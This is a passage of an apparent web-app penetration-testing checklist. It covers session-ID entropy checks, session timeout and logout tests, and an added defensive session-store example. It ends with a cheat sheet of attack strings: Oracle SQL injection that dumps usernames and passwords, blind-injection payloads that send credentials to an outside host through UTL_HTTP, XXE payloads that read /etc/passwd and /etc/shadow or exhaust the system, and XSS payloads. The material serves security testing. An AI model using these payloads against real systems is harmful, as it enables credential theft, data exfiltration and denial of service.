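    """Constructed counter-based IDs (the weak case)."""
    return [f"{i:032d}" for i in range(n)]


def random_ids(n: int) -> List[str]:
    """Constructed IDs from the OS CSPRNG, 128 bits each."""
    return [secrets.token_hex(16) for _ in range(n)]


if __name__ == "__main__":
    for label, ids in (("counter", predictable_ids(1024)), ("csprng", random_ids(1024))):
        print(f"{label:8s} entropy ~{estimated_entropy_bits(ids):6.1f} bits,"
              f" sequential: {looks_sequential(ids)}")
```

A real capture should be taken from fresh logins spread over time, since an ID built from a timestamp plus a counter looks random in a burst but not across sessions.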
6. Long lived session IDs
------
[ ] Attempt to reuse sessions at 30 min, 1 hour, 24 hour intervals.
7. Insecure logout functionality
------
[ ] Determine if session is deleted serverside as well as client side.
(Intercept logout page and remove the Set-Cookie header which is attempting
to nullify the value)
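Items 1, 6 and 7 of this section are all properties of the server-side session store. The added example below (not from the gist) is a minimal store that rotates the ID at login so a preset value is never honoured, enforces an idle timeout on the server, and ends a session by deleting its record rather than by relying on the client to drop the cookie. Time is passed in explicitly so the behaviour can be checked; the timeout value and session shape are assumptions.

```python
import secrets
from typing import Dict, Optional


class SessionStore:
    """Server-side session table (constructed). IDs come from the OS CSPRNG,
    a login always rotates the ID, and logout deletes the server-side record."""

    IDLE_TIMEOUT = 30 * 60   # seconds; assumed policy

    def __init__(self) -> None:
        self._sessions: Dict[str, dict] = {}

    def create(self, now: float) -> str:
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None, "last_seen": now}
        return sid

    def login(self, presented_sid: Optional[str], user: str, now: float) -> str:
        """Fixation defence: whatever ID the client arrived with (cookie, URL
        or parameter) is discarded and a fresh one issued after authentication."""
        if presented_sid is not None:
            self._sessions.pop(presented_sid, None)
        sid = self.create(now)
        self._sessions[sid]["user"] = user
        return sid

    def user_for(self, sid: str, now: float) -> Optional[str]:
        """Resolve an ID to a user, enforcing idle expiry on the server side."""
        sess = self._sessions.get(sid)
        if sess is None:
            return None
        if now - sess["last_seen"] > self.IDLE_TIMEOUT:
            self._sessions.pop(sid, None)
            return None
        sess["last_seen"] = now
        return sess["user"]

    def logout(self, sid: str) -> None:
        """Deleting the record is what ends the session; clearing the cookie
        with Set-Cookie is a courtesy the client may ignore."""
        self._sessions.pop(sid, None)


if __name__ == "__main__":
    store = SessionStore()
    sid = store.login("attacker-chosen-id", "alice", now=1000.0)
    print("rotated:", sid != "attacker-chosen-id")
    print("preset id valid:", store.user_for("attacker-chosen-id", now=1001.0))
    store.logout(sid)
    print("after logout:", store.user_for(sid, now=1002.0))
```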
+-----------------------------------------------------------------------------+
| VARIOUS ATTACK STRINGS |
+-----------------------------------------------------------------------------+
==========================SQL Injection (Oracle)===============================
Get table info:
SELECT table_name FROM all_tables WHERE TABLESPACE_NAME='USERS'
Get column info of a specific table:
SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME'
Get database name:
SELECT name FROM v$database
Get the name of the database we are currently in:
SELECT global_name FROM global_name
Get the database usernames and passwords:
SELECT username,password FROM dba_users;
Get the database server version information:
SELECT banner||'-'||(SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')
FROM v$version WHERE banner LIKE 'TNS%'
Similar to above:
SELECT product FROM product_component_version
SELECT version FROM product_component_version
Get the current database user:
SELECT user FROM dual
Same as above:
SELECT username FROM v$session WHERE audsid=sys_context('userenv','SESSIONID')
AND rownum=1
Search for a specific table name using LIKE keyword:
(Search for a table that contains ...AUTH...)
SELECT table_name FROM dba_tab_columns WHERE table_name LIKE '%25AUTH%25'
For Blind Oracle SQL Injection:
When using UTL_HTTP.REQUEST you must have an HTTP server running on
your machine to log the results.
Get user:
'+||+UTL_HTTP.REQUEST('http://ip.ip.ip.ip/sql.php?SQL='||(select
concat(username,password) from dba_users))||'--
Same as above but using || to concatenate instead of concat():
'+||+UTL_HTTP.REQUEST('http://ip.ip.ip.ip/sql.php?SQL='||(select
ID||':'||PWD from TABLE where rownum=1))||'--
==============================XML Injection=====================================
count(/child::node())
x' or name()='username' or 'x'='y
<name>','')); phpinfo(); exit;/*</name>
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
<?xml version="1.0" encoding="ISO-8859-1"?>
<foo>
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<foo>
<![CDATA[' or 1=1 or ''=']]>
</foo>
External Entity Inclusion 1:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file://c:/boot.ini">]>
<foo>&xxe;</foo>
External Entity Inclusion 2:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:////etc/passwd">]>
<foo>&xxe;</foo>
External Entity Inclusion 3:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:////etc/shadow">]>
<foo>&xxe;</foo>
External Entity Inclusion 4: BE CAREFUL, THIS WILL DOS THE SYSTEM!
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:////dev/random">]>
<foo>&xxe;</foo>
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
<xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
TODO: Add More...